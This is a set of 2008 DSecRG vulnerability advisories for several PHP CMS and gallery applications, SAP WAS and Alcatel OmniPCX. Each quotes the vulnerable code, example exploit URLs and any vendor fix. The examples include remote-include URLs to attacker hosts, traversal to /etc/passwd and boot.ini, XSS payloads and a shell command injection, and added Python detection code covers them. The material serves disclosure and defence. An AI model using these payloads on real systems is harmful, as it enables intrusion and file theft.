1.1 Remote File Include vulnerability found in script admin/create_order_new.php

Vulnerable GET parameter: include_page.

Code

#

...
   $command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...

if($command!="")
{
    switch($command){
    ...
    case 'include_page':
        require($HTTP_GET_VARS['include_page']);
        break;
...

#

Example:

http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php


1.2 Local File Include vulnerability found in script 
includes/events_application_top.php

Successful exploitation requires that register_globals is enabled.

Code

#

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_EVENTS_MESSAGES_MAIL); 

#

Example:

http://[server]/[installdir]/includes/events_application_top.php?language=../../../../../../../../../../../../../etc/passwd%00


1.3 Local File Include vulnerabilities found in scripts 

includes/languages/english/account.php
includes/languages/french/account.php

Successful exploitation requires that register_globals is enabled.

Code

#

require(DIR_WS_LANGUAGES . $language . '/events_account.php');

#

Example:

http://[server]/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00


1.4 Local File Include vulnerability found in script 
includes/languages/french/account_newsletters.php

Successful exploitation requires that register_globals is enabled.

Code

#

require(DIR_WS_LANGUAGES . $language . '/events_account_newsletters.php');

#

Example:

http://[server]/[installdir]/includes/languages/french/account_newsletters.php?language=../../../../../../../../../../../../../etc/passwd%00


1.5 Local File Include vulnerability found in script 
includes/modules/faqdesk/faqdesk_article_require.php

Successful exploitation requires that register_globals is enabled.

Code

#

//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_FAQDESK_REVIEWS_ARTICLE);

#

Example:

http://[server]/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00


1.6 Local File Include vulnerability found in script 
includes/modules/newsdesk/newsdesk_article_require.php

Successful exploitation requires that register_globals is enabled.

Code

#

//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_NEWSDESK_REVIEWS_ARTICLE);

#

Example:

http://[server]/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00


1.7 Local File Include vulnerability found in script 
templates/Freeway/boxes/card1.php

Successful exploitation requires that register_globals is enabled.

Code

#

require(DIR_WS_LANGUAGES . $language . '/cards1_box.php');

#

Example:

http://[server]/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00


1.8 Local File Include vulnerability found in script 
templates/Freeway/boxes/loginbox.php

Successful exploitation requires that register_globals is enabled.

Code

#

require(DIR_WS_LANGUAGES . $language . '/loginbox.php');

#

[DSECRG-08-035] Local File Include Vulnerability in Gallery 1.5.7, 1.6-alpha3

2008-08-08 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-035


Application:Gallery 
Versions Affected:  1.5.7, 1.6-alpha3
Vendor URL: http://gallery.menalto.com/
Bug:Local File Include
Exploits:   YES
Reported:   14.07.2008
Vendor response:15.07.2008
Solution:   YES
Date of Public Advisory:08.08.2008
Authors:Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Gallery has a local file include vulnerability in script 
contrib/phpBB2/modules.php

Successful exploitation requires that register_globals is enabled.

Code

#

switch ($_REQUEST['op']) {
case 'modload':
// Added with changes in Security for PhpBB2.
define('IN_PHPBB', true);

define('LOADED_AS_MODULE', 1);
$phpbb_root_path = './';
// connect to phpbb
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.'.$phpEx);
include_once($phpbb_root_path . 'includes/functions.'.$phpEx);

#

Example:

http://[server]/[installdir]/contrib/phpBB2/modules.php?op=modload&phpEx=../../../../../../../../../../../../../etc/passwd


Solution
***

The vendor fixed this flaw on 05.08.2008. Download Gallery 1.5.8 and 1.6-RC1 from 
the download page on SourceForge:

http://sourceforge.net/project/showfiles.php?group_id=7130&package_id=7239&abmode=1

More information about release: 
http://gallery.menalto.com/gallery_1.5.8_released



About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services, and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems, with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)




[DSECRG-08-034] Local File Include Vulnerability in Minishowcase v09b136

2008-07-29 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-034


Application:Minishowcase Image Gallery  
Versions Affected:  v09b136
Vendor URL: http://minishowcase.frwrd.net
Bug:Local File Include
Exploits:   YES
Reported:   14.07.2008
Second report:  22.07.2008
Vendor response:NONE
Solution:   NONE
Date of Public Advisory:29.07.2008
Authors:Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Minishowcase Image Gallery has a local file include vulnerability in script 
libraries/general.init.php

Vulnerable GET parameter: lang.

Successful exploitation requires that register_globals is enabled.

Code

#

...
$_dir_file = dirname(dirname(__FILE__));
$_dir_path = dirname($_SERVER['DOCUMENT_ROOT'] . $_SERVER['PHP_SELF']);

if ($_dir_file != $_dir_path) {
if (!isset($settings['minishowcase_url'])
|| ($settings['minishowcase_url'] == "")) {
die ("<p style=\"margin:6px;padding:20px;text-align:left;font-size:18px;background:#f60;color:#FFF;\">ALERT: if you are including minishowcase with PHP into a website, please set the <code>\$minishowcase_url</code> variable in the <code>/config/settings.php</code> file</p>");
}
}
...
if (isset($_GET['lang'])) $set_language = $_GET['lang'];
$langfile = ROOT.'languages/'.$set_language.'.php';
require_once($langfile);

#

Example:

http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRG&lang=../../../../../../../../../../../../../etc/passwd%00
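The request shapes in the Freeway, Gallery and Minishowcase examples above (traversal plus a %00 terminator in a file-name parameter, a remote URL in an include parameter, and an array-style parameter that only has an effect under register_globals) are easy to spot in web server logs. The following is an added detection example in Python, not code from any of the advisories or vendors; it runs over constructed combined-format log lines with made-up hosts, paths and timestamps.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request shapes taken from the examples in the advisories above.
TRAVERSAL = re.compile(r"\.\.[/\\]")                   # ../ or ..\ path segments
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)   # include source on another host
ARRAY_PARAM = re.compile(r"^\w+\[[^\]]*\]$")           # e.g. settings[minishowcase_url]
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def analyse_target(target: str) -> list:
    """Return findings for one request target (path plus query string).
    parse_qsl percent-decodes values, so %00 arrives here as a real NUL byte,
    which is exactly what the vulnerable PHP scripts saw in $_GET."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if ARRAY_PARAM.match(name):
            # With register_globals on, foo[bar]=x in the URL becomes $foo['bar']
            # inside the script; that is how the Minishowcase die() guard is bypassed.
            findings.append(f"array-style parameter {name}")
        if REMOTE_URL.match(value):
            findings.append(f"remote URL in parameter {name}")
        if TRAVERSAL.search(value):
            findings.append(f"path traversal in parameter {name}")
        if "\x00" in value:
            findings.append(f"null byte in parameter {name}")
    return findings


def scan_log(lines) -> list:
    """Run analyse_target over each request line of an access log and return
    (target, findings) pairs for the lines that produced at least one finding."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        findings = analyse_target(match.group("target"))
        if findings:
            hits.append((match.group("target"), findings))
    return hits


# Constructed access-log lines (combined log format, RFC 5737 test addresses).
# The query strings mirror the advisory examples; hosts, paths and times are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2009:10:01:02 +0000] "GET /shop/includes/events_application_top.php'
    '?language=../../../../etc/passwd%00 HTTP/1.1" 200 1432 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [12/Mar/2009:10:01:09 +0000] "GET /shop/admin/create_order_new.php'
    '?command=include_page&include_page=http://203.0.113.9/info.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [12/Mar/2009:10:02:30 +0000] "GET /gallery/libraries/general.init.php'
    '?settings[minishowcase_url]=x&lang=../../../../etc/passwd%00 HTTP/1.1" 200 2201 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [12/Mar/2009:10:03:00 +0000] "GET /gallery/libraries/general.init.php'
    '?lang=en HTTP/1.1" 200 2201 "-" "Mozilla/4.0"',
]


if __name__ == "__main__":
    for target, findings in scan_log(SAMPLE_LOG):
        print(target)
        for finding in findings:
            print("   ", finding)
```

The legitimate `lang=en` request produces no finding, so the same rules can be applied to a live log without flooding on normal traffic.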


Solution
***

No response or updates from the vendor.






[DSECRG-08-032] Claroline 1.8.10 Multiple XSS Vulnerabilities

2008-07-22 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-032


Application:Claroline eLearning and eWorking platform
Versions Affected:  1.8.10
Vendor URL: http://www.claroline.net/
Bug:Multiple Linked XSS
Exploits:   YES
Reported:   18.07.2008
Vendor Response:22.07.2008
Solution:   YES
Date of Public Advisory:22.07.2008
Author: Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Claroline system has multiple linked XSS vulnerabilities.



Details
***

1. Multiple linked XSS vulnerabilities found. An attacker can inject XSS into the 
URL string.

1.1 Linked XSS vulnerabilities found in scripts:

claroline/announcements/messages.php
claroline/auth/lostPassword.php
claroline/auth/profile.php
claroline/calendar/myagenda.php
claroline/group/group.php
claroline/learnPath/learningPath.php
claroline/learnPath/learningPathList.php
claroline/learnPath/module.php
claroline/phpbb/index.php
claroline/tracking/courseLog.php
claroline/tracking/course_access_details.php
claroline/tracking/delete_course_stats.php
claroline/tracking/userLog.php
claroline/tracking/user_access_details.php
claroline/user/user.php
claroline/user/userInfo.php

An attacker can inject XSS into the URL string.

Example:

http://[server]/[installdir]/claroline/calendar/myagenda.php?;<script>alert('DSecRG XSS')</script>
http://[server]/[installdir]/claroline/user/user.php?;<script>alert('DSecRG XSS')</script>


1.2 Linked XSS vulnerability found in claroline/tracking/courseLog.php 

GET parameter view

Example:

http://[server]/[installdir]/claroline/tracking/courseLog.php?view=DSec; STYLE=xss:expression(alert('DSecRG XSS'))


1.3 Linked XSS vulnerability found in claroline/tracking/toolaccess_details.php 

GET parameter toolId

Example:

http://[server]/[installdir]/claroline/tracking/toolaccess_details.php?toolId=;<script>alert('DSecRG XSS')</script>



Solution
***

The vendor fixed this flaw on 22.07.2008. The new version, 1.8.11, can be downloaded here:

http://downloads.sourceforge.net/claroline/claroline1811.tar.gz
http://downloads.sourceforge.net/claroline/claroline1811.zip







[DSECRG-08-029] Local File Include in Dokeos E-Learning System 1.8.5

2008-07-17 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-029


Application:Dokeos E-Learning System
Versions Affected:  1.8.5
Vendor URL: http://dokeos.com/
Bug:Local File Include
Exploits:   YES
Reported:   01.07.2008
Vendor response:05.07.2008
Solution:   YES
Date of Public Advisory:17.07.2008
Authors:Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Dokeos E-Learning System has a local file include vulnerability in script 
user_portal.php

Vulnerable GET parameter: include.

A registered user can exploit this vulnerability.

Code

#

if (!empty ($_GET['include']) && !strstr($_GET['include'], '/') && strstr($_GET['include'], '.html'))
{
include ('./home/'.$_GET['include']);
$pageIncluded = true;
}
else
...

#

Example:

http://[server]/[installdir]/user_portal.php?include=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.html


Fix Information
***

You can fix it by following the official information at 
http://www.dokeos.com/wiki/index.php/Security, or wait for a new release.


Fixing this issue can be done by replacing line 770 of /user_portal.php with: 

if (!empty ($_GET['include']) && preg_match('/^[a-zA-Z0-9_-]*\.html$/', $_GET['include']))
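The difference between the original condition and the replacement line is the difference between a blocklist (reject '/', require the substring '.html' somewhere) and an allowlist (the whole value must match a strict pattern). The following is an added Python re-implementation of both checks, not Dokeos code, run over constructed values including the backslash-plus-%00 shape of the advisory's own example; only the regex is taken from the vendor fix.

```python
import re
from urllib.parse import unquote

# The regex is the one quoted in the vendor fix above; everything else in this
# block is an added illustration, not Dokeos code.
FIXED_PATTERN = re.compile(r"^[a-zA-Z0-9_-]*\.html$")


def original_check(include: str) -> bool:
    """Mirror of the original user_portal.php condition, a blocklist:
    !empty($_GET['include']) && !strstr($_GET['include'], '/') && strstr($_GET['include'], '.html')
    PHP's strstr() is a substring test, so '.html' may sit anywhere in the value,
    and a backslash is not a rejected separator."""
    return bool(include) and "/" not in include and ".html" in include


def fixed_check(include: str) -> bool:
    """Mirror of the replacement line 770, an allowlist: the whole value must be a
    bare file name built from [a-zA-Z0-9_-] that ends in '.html'."""
    return bool(include) and FIXED_PATTERN.match(include) is not None


def evaluate(raw_value: str) -> dict:
    """Decode a raw query-string value the way PHP fills $_GET (so %00 becomes a
    real NUL byte) and report what each check decides about it."""
    decoded = unquote(raw_value)
    return {
        "decoded": decoded,
        "original_accepts": original_check(decoded),
        "fixed_accepts": fixed_check(decoded),
    }


# Constructed sample values. "advisory_shape" follows the advisory's own payload
# (backslash traversal, %00, then a '.html' suffix) with fewer '..' segments.
# "trailing_newline" documents a caveat: '$' in PCRE and in Python's re also
# matches just before one trailing newline, so 'welcome.html\n' passes the fixed
# check too; harmless here because the '.html' suffix is still enforced.
SAMPLES = {
    "legit": "welcome.html",
    "advisory_shape": r"..\..\..\boot.ini%00.html",
    "forward_slash": "../../etc/passwd%00.html",
    "no_suffix": "welcome",
    "trailing_newline": "welcome.html%0a",
}


def run_samples() -> dict:
    """Evaluate every sample; returned as a dict so it can be inspected or asserted."""
    return {label: evaluate(value) for label, value in SAMPLES.items()}


if __name__ == "__main__":
    for label, result in run_samples().items():
        print(f"{label:17} original={result['original_accepts']!s:5} "
              f"fixed={result['fixed_accepts']}")
```

The original check accepts the advisory-shaped value because it contains no forward slash and does contain '.html'; the %00 then cuts the path short of that suffix on PHP versions of the time, which is why the appended '.html' satisfies the check without affecting the file that gets included.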




Regards,
Digital Security Research Group [DSecRG]

DIGITAL SECURITY
tel/fax: +7(812)703-1547
tel: +7(812)430-9130
e-mail:  [EMAIL PROTECTED]
web: www.dsec.ru






[DSECRG-08-027] Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC

2008-07-04 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-027


Application:1024 CMS
Versions Affected:  1.4.3, 1.4.4 RFC
Vendor URL: http://www.1024cms.com/
Bug:Multiple Remote/Local File Include
Exploits:   YES
Reported:   18.06.2008
Second report:  27.06.2008
Vendor Response:NONE
Solution:   NONE
Date of Public Advisory:04.07.2008
Author: Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***


1024 CMS has a Remote File Include vulnerability and multiple Local File Include 
vulnerabilities. 


1. Remote/Local File Include vulnerabilities found in scripts: 

themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php

Code

#

<?php include("./themes/".$theme_dir."/layouts/basic_header.php"); ?>
<div class="centerbigtable">
<?php
if(!isset($page_include)) {
if($page_ck['custom'] == '0') 
include("./pages/".$page."/default/content.php");
else include("./pages/custom/".$page."/default/content.php");
} else include($page_include);
?>

#

Example:

http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php
http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00





Multiple Local File Include vulnerabilities:

2. Local File Include vulnerability found in script 
admin/lang/fr/reports/default.php

Code

#

if(isset($_GET['t'])) {
switch($_GET['t']) {
case "forum":
include("../admin/lang/".$lang."/reports/ops/forum.php");
break;

case "download":
include("../admin/lang/".$lang."/reports/ops/download.php");
break;

case "news":
include("../admin/lang/".$lang."/reports/ops/news.php");
break;
}
} else die("You cannot access this page directly");

#

Example:

http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00


3. Local File Include vulnerabilities found in scripts:

admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php

Code

#

<?php
include("./themes/".$admin_theme_dir."/templates/default_header.tpl");
...

#

Example:

http://[server]/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://[server]/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00


4. Local File Include vulnerabilities found in scripts:

lang/en/moderator/default.php
lang/fr/moderator/default.php

Code

#

if(isset($_GET['t'])) {
switch($_GET['t']) {
case "forum":
include("./lang/".$lang."/moderator/ops/forum.php");
break;

case "download":
include("./lang/".$lang."/moderator/ops/download.php");
break;

case "gallery":
include("./lang/".$lang."/moderator/ops/gallery.php");
break;

case "news":
include("./lang/".$lang."/moderator/ops/news.php");
break;
}
}

#

Example:

http://[server]/[installdir]/lang/en/moderator/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://[server]/[installdir]/lang/fr/moderator/default.php?t=download&lang=../../../../../../../../../../../../../boot.ini%00


5. Local File Include vulnerability found in script 
lang/de/moderator/default.php

Code

#

if(isset($_GET['t'])) {
switch($_GET['t']) {
case "forum":
include("./lang/".$lang."/moderator/ops/forum.php");
break;

case "download":
include("./lang/".$lang."/moderator/ops/download.php");
break;

case "news":
include("./lang/".$lang."/moderator/ops/news.php");
break;
}
}

#

[DSECRG-08-024] Multiple Security Vulnerabilities (RFI,LFI,XSS) in QuateCMS

2008-05-23 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-024


Application:Quate CMS
Versions Affected:  0.3.4
Vendor URL: http://www.quate.net/
Bugs:   RFI, Multiple LFI, Directory traversal, 
Multiple XSS
Exploits:   YES
Reported:   18.03.2008
Second report:  25.03.2008
Vendor response:NONE
Solution:   NONE
Date of Public Advisory:23.05.2008
Author: Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Quate CMS has multiple security vulnerabilities:

1. Multiple Remote/Local File Include
2. Multiple Linked XSS vulnerabilities 
3. Directory traversal 


Details
***

1. Quate CMS has Multiple Local File Include vulnerabilities.

1.1 Local File Include vulnerability found in script admin/includes/footer.php

Code

#

if ($not_logged_in != 1) {
 if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {
  require_once("themes/" .$row_secure['account_theme']. "/footer.php");
 } else {
  require_once("themes/" .$admin_template_default. "/footer.php");
 }
} else {
 require_once("themes/" .$admin_template_default. "/footer.php");
}

#

Example:

http://[server]/[installdir]/admin/includes/footer.php?admin_template_default=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/admin/includes/footer.php?not_logged_in=1&admin_template_default=../../../../../../../../../../../../../etc/passwd%00


1.2 Remote and Local File Include vulnerability found in script 
admin/includes/header.php

Code

#

if ($bypass_installed != 1) {
if (!is_file("../includes/installed")) {
...
require("../includes/simple_gui.php");
exit();
}
}

if ($bypass_restrict != 1) {
 require_once($secure_page_path. "includes/secure.php");
}

$admin_template_default = "default";
if ($not_logged_in != 1) {
 //echo $row_secure['account_theme'];
 if (file_exists("includes/themes/" .$row_secure['account_theme']. "/header.php")) {
  require_once("themes/" .$row_secure['account_theme']. "/header.php");
 } else {
  require_once("themes/" .$admin_template_default. "/header.php");
 }
} else {
 require_once("themes/" .$admin_template_default. "/header.php");
}

#

Example:

http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1&secure_page_path=http://evilhost/info.php%00
http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00


-


2. Linked XSS in path vulnerability found in the following pages:

/admin/index.php
/admin/login.php
/admin/credits.php
/upgrade/index.php

Example:

http://[server]/[installdir]/admin/login.php/;<script>alert("DSecRG XSS")</script>
http://[server]/[installdir]/upgrade/index.php/;<IMG SRC=javascript:alert('DSecRG XSS')>

-


3. File Manager directory traversal

An administrator can access system files outside the htdocs directory using a 
directory traversal vulnerability.

http://[server]/[installdir]/admin/filemanager.php?type=edit&dir=/../../../../../../../../..&file=boot.ini




[DSECRG-08-025] Local File Include in OneCMS 2.5

2008-05-23 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-025


Application:OneCMS
Versions Affected:  2.5
Vendor URL: http://www.insanevisions.com/
Bug:Local File Include
Exploits:   YES
Reported:   26.03.2008
Vendor Response:NONE
Solution:   NONE
Date of Public Advisory:23.05.2008
Author: Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Local File Include vulnerability found in script install_mod.php


Code

#

 $mod = $_GET['load'];
 $filexp = explode(".", $mod);
 $filetype = $filexp[1];
 $file = $filexp[0];
 $file2 = "mods/$mod";

 if (!is_numeric($mod)) { // makes sure that the user isnt entering a #
 if ($filetype == "php") {
 if ($_GET['act'] == "") {
 echo "Are you sure you would like to install the <b>".$file."</b> module?<br><a href='install_mod.php?load=".$mod."&act=go'>Yes</a>";
 }
 if ($_GET['act'] == "go") {
 include ($file2);
 ...

#


Example:

http://[server]/[installdir]/install_mod.php?act=go&load=1234.php../../../../../../../../../../../../../etc/passwd




[DSECRG-08-023] SAP Web Application Server XSS Security Vulnerability

2008-05-21 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-023


Application:SAP Web Application Server  
Versions Affected:  Version 7.0 
Vendor URL: http://SAP.com
Bugs:   XSS
Exploits:   YES
Reported:   25.01.2008
Vendor response:25.01.2008
Date of Public Advisory:21.05.2008
Author: Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

SAP Web Application Server has a linked XSS security vulnerability.



Details
***


Linked XSS vulnerability found in URL /sap/bc/gui/sap/its/webgui/. An attacker can 
inject XSS into the URL string.

Web Dynpro ABAP and BSP are also vulnerable.



Example:

http://[server]:8000/sap/bc/gui/sap/its/webgui/aaa;<img/src=javascript:alert('DSECRG_XSS')>

-




Fix Information
***

The issue has been solved in the ICF system login and as such it is not only 
relevant for the Web GUI, but also for Web Dynpro ABAP and for BSP.

Customers can download patches following the solution documented in SAP note 
1136770.









[DSECRG-08-020] Alcatel OmniPCX Office Remote Command Execution

2008-05-21 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-020


Application:Alcatel OmniPCX Office 
Versions Affected:  Alcatel OmniPCX Office since release 210/061.1 
Vendor URL: http://alcatel.com
Bugs:   Remote command execution
Exploits:   YES
Risk:   High
CVSS Score: 7.31
CVE-number: 2008-1331
Reported:   31.01.2008
Vendor response:01.02.2008
Customers informed: 07.03.2008
Published on PSIRT: 01.04.2008
Date of Public Advisory:21.05.2008
Author: Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Introduction
***

The OmniPCX Enterprise is an integrated communications solution for
medium-sized businesses and large corporations. It combines the best of
the old (legacy TDM phone connectivity) with the new (a native IP
platform and support for Session Initiation Protocol, or SIP) to provide
an effective and complete communications solution for cost-conscious
companies on the cutting edge.

(from the vendor's homepage)


Description
***

The Alcatel OmniPCX Office web interface has a critical security vulnerability: 
remote command execution.

The risk of this vulnerability is high. Any user who has access to the web 
interface of the OmniPCX Enterprise solution will be able to execute arbitrary 
commands on the server with the permissions of the web server.


Details
***


Remote command execution vulnerability found in script /cgi-data/FastJSData.cgi 
in parameter id2. The variable id2 is not filtered when passed to the shell, so 
arbitrary commands can be executed on the server by adding them to the 
user-supplied value, separated by semicolons.

You can find more details on this advisory on the vendor's website 
http://www1.alcatel-lucent.com/psirt/statements.htm 
under reference 2008001.



Example:


http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd




Fix Information
***

Alcatel fixed this flaw on 01.04.2008. The updated version can be 
downloaded here:

http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html







[DSECRG-08-022] Multiple Security Vulnerabilities in Bolinos 4.6.1

2008-03-25 Thread Digital Security Research Group


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-022


Application:BolinOS 
Versions Affected:  4.6.1
Vendor URL: http://www.bolinos.com
Bugs:   Local File Include,Multiple XSS,  System 
information disclosure
Exploits:   YES
Reported:   13.03.2008
Second report:  18.03.2008
Vendor response:none
Solution:   none
Date of Public Advisory:25.03.2008
Authors:Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

BolinOS has multiple security vulnerabilities:

1. Local File Include
2. Multiple Linked XSS vulnerabilities
3. Multiple XSS in POST
4. System information disclosure



Details
***

1. Local File Include vulnerability found in 
system/_b/contentFiles/gbincluder.php


Code

#

$actionpagetoinclude=$_GET["_bFileToInclude"];
if($actionpagetoinclude!="" && @file_exists(gBRootPath."/$actionpagetoinclude")){
   @include(gBRootPath."/$actionpagetoinclude");
   }
else{
   echo "NO FILE";
  }

#

Example:

http://[server]/[installdir]/system/_b/contentFiles/gbincluder.php?_bFileToInclude=../../../../../../../../../../../../../etc/passwd

-


2. Multiple linked XSS vulnerabilities found. 

2.1 Linked XSS vulnerability found in page 
/system/actionspages/_b/contentFiles/gBImageViewer.php 

An attacker can inject XSS into GET parameter url.

Example:

http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBImageViewer.php?url=<script>alert('DSecRG XSS')</script>


2.2 Linked XSS vulnerability found in page 
/system/actionspages/_b/contentFiles/gBselectorContents.php 

An attacker can inject XSS into GET parameter ForEditor.

Example:

http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBselectorContents.php?ForEditor='<IMG%20SRC=javascript:alert('DSecRG XSS')>


2.3 Linked XSS vulnerabilities found in following pages:

/system/actionspages/_b/contentFiles/gBLoginPage.php
/system/actionspages/_b/contentFiles/gBPassword.php

An attacker can inject an XSS script into the URL.

Example:

http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBLoginPage.php/;<script>alert('DSecRG XSS')</script>
http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBPassword.php/;<script>alert('DSecRG XSS')</script>

-


3. Multiple XSS in POST vulnerabilities: an attacker can inject XSS into POST 
parameters.

3.1 Vulnerability found in script 
/system/actionspages/_b/contentFiles/gBLoginPage.php 

POST parameter formlogin.

Example:

POST /bolinos/system/actionspages/_b/contentFiles/gBLoginPage.php?bAddress=bolinos.sessions HTTP/1.0
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET CLR 2.0.50727)

formlogin=%27img%20src%3d%22javascript:alert(%27DSecRG%20XSS%27)%22&BtLogin.x=


3.2 Vulnerability found in page /help/index.php 

POST parameter bolini_searchengine46Search.

Example:

bolini_searchengine46Search = '<IMG SRC=javascript:alert(&quot;DSecRG&#x20;XSS&quot;)>




4. System information disclosure

An unauthenticated user can access the phpinfo() page.

http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBphpInfo.php




[DSECRG-08-019] LFI in PowerBook 1.21

2008-03-24 Thread Digital Security Research Group
Hello, bugtraq.


[DSECRG-08-031] Digital Security Research Group [DSecRG] Advisory


Application:PowerBook
Versions Affected:  1.21
Vendor URL: http://www.powerscripts.org/
Bug:Local File Include
Exploits:   YES
Reported:   01.02.2008
Vendor Response:none
Solution:   none
Date of Public Advisory:..2008
Author: Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Local File Include vulnerability found in script pb_inc/admincenter/index.php 

An unauthenticated user can directly access this script.

To exploit this vulnerability, the REGISTER_GLOBALS option must be ON in the PHP 
config file.


Code

#

  if (!$page) {
     $page = "home";
  }

  $page .= ".inc.php";

  if(file_exists($page) == false) {
     echo "<div align=\"center\">Sorry, the page <b>$page</b> does not exist!</div>";
  } else {
     include($page);
  }

#


Example:

http://[server]/[installdir]/pb_inc/admincenter/index.php?page=../../../../../../../../../../../../../etc/passwd%00






-- 
Alexandr Polyakov
DIGITAL SECURITY RESEARCH GROUP

   mailto:[EMAIL PROTECTED]



[DSECRG-08-017] Flyspray 0.9.9.4 Multiple Security Vulnerabilities

2008-03-03 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-017


Application:Flyspray (web-based bug tracking system)
Versions Affected:  0.9.9.4
Vendor URL: http://www.flyspray.org
Bugs:   SiXSS, Stored XSS, Brute Force
Exploits:   YES
Reported:   08.02.2008
Vendor response:08.02.2008
Solution:   24.02.2008 
Date of Public Advisory:03.03.2008
Author: Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Flyspray system has multiple security vulnerabilities:

1. SiXSS in POST
2. Stored XSS in POST
3. Login Error Messages Credential Enumeration


Details
***


1. SiXSS in POST: an attacker can inject XSS code into the SQL error message.


1.1 Vulnerabilities found in script index.php?do=myprofile.

POST parameters tasks_perpage, time_zone, account_enabled, notify_own.

Example:

tasks_perpage = <script>alert('DSecRG XSS')</script>
time_zone = <img src=javascript:alert('DSecRG XSS')>


1.2 Vulnerabilities found in script index.php?do=admin&area=newproject.

POST parameters anon_open, others_view.

Example:

anon_open = <img src=javascript:alert('DSecRG XSS')>


1.3 Vulnerabilities found in script index.php?do=admin&area=cat.

POST parameters lft[4], rgt[4].

Example:

rgt[4] = <script>alert('DSecRG XSS')</script>


1.4 Vulnerabilities found in script index.php?do=pm&area=prefs.

